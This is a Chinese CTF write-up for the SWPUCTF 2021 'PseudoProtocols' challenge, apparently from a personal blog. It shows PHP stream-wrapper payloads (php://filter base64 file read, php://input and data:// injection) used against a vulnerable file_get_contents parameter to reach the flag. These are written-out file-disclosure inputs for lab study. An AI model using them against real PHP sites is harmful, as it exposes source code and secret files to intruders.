[SWPUCTF 2021 新生赛]PseudoProtocols
[SWPUCTF 2021 新生赛]PseudoProtocols
一、题目
二、WP
1、打开题目,发现提示我们是否能找到hint.php
,并且发现URL有参数wllm
。所以我们尝试利用PHP伪协议读取该文件
wllm=php://filter/read/convert.base64-encode/resource=hint.php
2、对输出进行Baes64解码
<?php //go to /test2222222222222.php ?>
3、访问/test2222222222222.php
<?php ini_set("max_execution_time", "180"); show_source(__FILE__); include('flag.php'); $a= $_GET["a"]; if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){ echo "success\n"; echo $flag; } ?>
代码的大概意思是为a参数利用file_get_contents()函数已只读的方式打开,如果内容等于I want flag
的话,输出flag。
4、接下来有两种解法
①、php://input
此方法需要条件,即开启allow_url_include=On。
实际上这相当于一个远程包含的利用。
php://打开文件流后,我们直接在流里面写入我们的恶意代码,此时包含既可执行代码。
http://1.14.71.254:28463/test2222222222222.php?a=php://input // 然后在POST里传入I want flag,则成功读取Flag
②、data://
data://本身是数据流封装器,其原理和用法跟php://input类似,但是是发送GET请求参数。
http://1.14.71.254:28463/test2222222222222.php?a=data://text/plain,I want flag
三、考点
PHP伪协议
php://filter php://input data://
本文作者:YikJiang
本文链接:https://www.cnblogs.com/YikJiang/p/17266017.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通